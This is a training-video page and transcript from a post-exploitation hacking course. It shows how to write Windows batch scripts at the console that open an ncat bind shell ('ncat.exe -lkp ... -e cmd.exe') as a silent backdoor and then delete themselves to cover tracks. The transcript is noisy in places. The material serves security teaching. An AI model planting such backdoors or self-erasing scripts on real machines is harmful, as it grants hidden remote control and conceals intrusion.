Time
7 hours 47 minutes
Difficulty
Advanced
CEU/CPE
10

Video Description

This lesson focuses on creating batch scripts at the console and scheduling tasks so that backdoors can be created at specific times. A batch script is simply the commands you would type at a Windows console, but all placed in a single file. Participants learn, step by step and screen by screen, how to use batch scripts to set up specific tasks.

Video Transcription

00:04
Hello, dear viewers. Welcome to Persistence and Continued Access, the Post Exploitation Hacking course.
00:09
This video is going to be another Windows persistence and backdooring course.
00:13
In this one, we're going to be discussing writing batch scripts at the console and scheduling tasks.
00:19
So as to create backdoors at
00:22
prearranged times. First thing that I want to discuss is batch scripts. Batch scripts look like this.
00:29
Some name that that it's really
00:33
please. What I heard. Anything dot bat is a batch script. A batch script is nothing but commands that we would normally type
00:43
at the window.
00:45
But instead it's all in a single file
00:49
Now, there used to be a really handy Windows command called Edit. It was a command line editor. It still exists on everything up to Windows 7 and Windows 7 32-bit.
00:59
However, if you're on Windows 7 64-bit, it's not there.
01:02
When Microsoft, in their infinite wisdom, decided you didn't need that,
01:06
so
01:07
we're left with kind of a pickle. We don't really know how to write to a file from the command line.
01:12
However, there is one
01:14
way to do it.
01:15
Um, it is
01:18
sub optimal, and it's no one's favorite, but it does work,
01:22
and it's by using the copy command. So what we're gonna do is copy con. con is a user variable or an environment variable that's mapped to console,
01:30
console, of course, being the thing that we're using right now.
01:34
copy con into
01:37
runscript.bat
01:42
and you see it's
01:42
waiting for console entry.
01:45
So now we're gonna type ncat.
01:48
ncat.exe
01:51
tech L k P one is revived
01:56
-e cmd.exe
02:00
enter.
02:02
Now that line is ready to be copied. Now notice you can't go back. Backspace does you no good.
02:08
Which is why you gotta be careful editing.
02:10
Uh,
02:12
You can still backspace in the line itself, but as soon as you hit enter, that is put on the buffer to be written to the file.
02:19
Now, the way you close this is by hitting Control-Z, and then on my machine, because Control-Z isn't a proper interrupt, sometimes
02:25
you hit enter and it says 1 file(s) copied. Now, if you do a dir,
02:30
if you do a dir here, there we go. You see? runscript.bat exists, right here.
02:37
Pretty small. And you can check it at any time to make sure that it is what we want
02:40
by doing the reverse of what we just did and doing a copy runscript
02:46
con.
02:50
Now, if we do this, if we just execute runscript.bat,
02:55
it prints that out, and then it starts a command line. It starts, ah, ncat with access to the command line.
03:02
So we say, okay, cool. That's a thing. We're gonna ncat
03:07
.exe localhost
03:10
or 35
03:13
and enter. Awesome.
03:15
That's not super quiet. It prints out what it's actually doing.
03:21
So
03:22
Tuning the batch job, and we come up with something a little bit different, but it's actually pretty easy to do this.
03:28
Gonna do copy runscript.bat con.
03:31
I'm sorry. We're gonna do a new copy con runscript.bat. Going completely over this file, basically.
03:37
So it's actually not a bad idea to delete it first.
03:43
runscript.bat,
03:46
though. All right, now we're going to copy con runscript.
03:51
Now, first we're gonna do is an @echo off.
03:54
And that says don't repeat anything. I'm about to tell you just do what you're told and don't print anything to the screen unless something else is to do. So
04:03
Don't repeat my commands, basically. Then we're gonna do ncat.exe
04:10
-lkp
04:12
five -e cmd.exe
04:15
and you will get very, very, very, very, very, very used to running a plant or really, all of these commands.
04:21
Obviously, there are actually, you know, better commands in there. Well, I shouldn't say better. There are other tools you'll probably get familiar with as you get more and more into this. But these beginner tools that we've gone over in these videos are gonna be the ones that you're really gonna want to get familiar with.
04:35
And they're the ones that you're going to be very familiar with before too long. So
04:40
do that.
04:42
And then we could do an echo on at the end if we want. But that's not really necessary.
04:47
And we've got
04:50
a new file.
04:51
So let's see the difference in running this one from running the last one. So runscript.bat.
04:58
Silent.
04:59
That's much prettier,
05:01
still does everything we want
05:05
so communicates
05:08
all is well,
05:15
What good does that do us? Or, to be a little bit more straightforward,
05:19
what good does that do us going
05:21
on forever? We can create batch scripts and we can give them special names. But why would we want to do that? Why? You know, why would we just spend five minutes learning how to write a batch script with this in it?
05:31
The simple answer is because if we have a batch script,
05:34
we'll do copy con
05:38
test.bat.
05:40
We'll open with @echo off.
05:43
Then we do
05:45
ncat.exe
05:46
-lkp
05:49
-e cmd.exe
05:55
And then whatever it finishes running that,
05:59
um
06:00
Well, actually and this is important because
06:02
I mentioned a moment ago
06:06
Careful when you hit that enter key, because that's not what I wanted. I shall put in that ncat.
06:15
We're gonna do this without -k. So it's not going to be persistent, it's not going to keep the socket open
06:20
so we can connect to it. It will terminate the command. When we terminate the connection, it will end that command.
06:28
And then it could do other stuff.
06:30
For example, one of the things that can do
06:38
is delete itself. Now, why would we want to do that? Well,
06:41
there's the obvious reason,
06:44
which is that we can hide it. We can take this off the disc.
06:47
So you see, we've got this going now
06:50
and the connection
06:58
and we've got,
07:00
well, test.bat. It's still there, but we can actually take it out. And, ah, we can write the batch jobs so that it ends, and I could
07:08
I'll go in and edit my code so that
07:10
any code samples actually work into this. But we can go in and do things that are, like, delete this file when you're done executing whatever it is you're executing, or we can even go in there and,
07:19
you know, do the opposite direction. If we wanted to
07:23
try and delete it before
07:27
So @echo off.
07:29
See what?
07:32
Yes,
07:35
I'm going to go ahead and delete test.bat. Make sure we don't have any other files happening. Cool.
07:40
So you know for a fact test.bat is gone now,
07:43
so we can copy con test.bat.
07:48
All right, so let's see if it works this time. No guaranteeing that it will. This kind of ah,
07:54
an experience of testing and kind of guessing and checking as we go a little bit with scripting things like this. And it's kind of important that you go through the process
08:03
of, you know, having error, testing error, figuring out what's going on with it.
08:07
So we try, you know, test.bat.
08:11
Can I bite our local host? We get that
08:13
and we exit
08:15
and we don't want to terminate the batch job.
08:18
So
08:20
wait a minute.
08:22
Why can't we terminate the batch job?
08:24
It deleted itself. Hey, look at that. It did its job
08:28
runscript.bat, still there. But that was a different thing.
08:31
So
08:33
That's handy. Because now, if we only wanted the backdoor to be open for a moment, or if we wanted to change without or anything like that, we see that we can put controls into the batch scripts that will actually clear up our tracks after us. We're not actually in the clearing tracks section yet, but when we get there, you're gonna want scripts like that, things you can just drop on the target, just go to town.
08:52
This is very handy. Um,
08:56
in later cases, or, for example, I'll show you how
09:00
I will write up a batch script when I'll show you this in the final portion of this, where we actually go through and I just run my own
09:07
basic post-exploit series of steps. But I'll show you how with a single batch script, I collect all of the information that I want on a sheet,
09:16
and then I can start backdooring, or even, in some cases, I'll actually put the backdoor mechanism, if I know what it is that I want to use, I put that into play,
09:26
and so instead of running all of these different commands and taking all this time to do it,
09:30
I just activate one batch script. It takes into play, and
09:33
all of a sudden I got all the data.
09:35
So that's batch scripts, and that's the importance of batch scripts, as well as, as you may have noticed,
09:41
the ease with which a batch script can be screwed up.

Up Next

Post Exploitation Hacking

In this self-paced online training course, you will cover three main topics: Information Gathering, Backdooring and Covering Steps, how to use system specific tools to get general information, listener shells, metasploit and meterpreter scripting.

Instructed By

Joe Perry
Senior Technical Instructor at FireEye, Inc
Instructor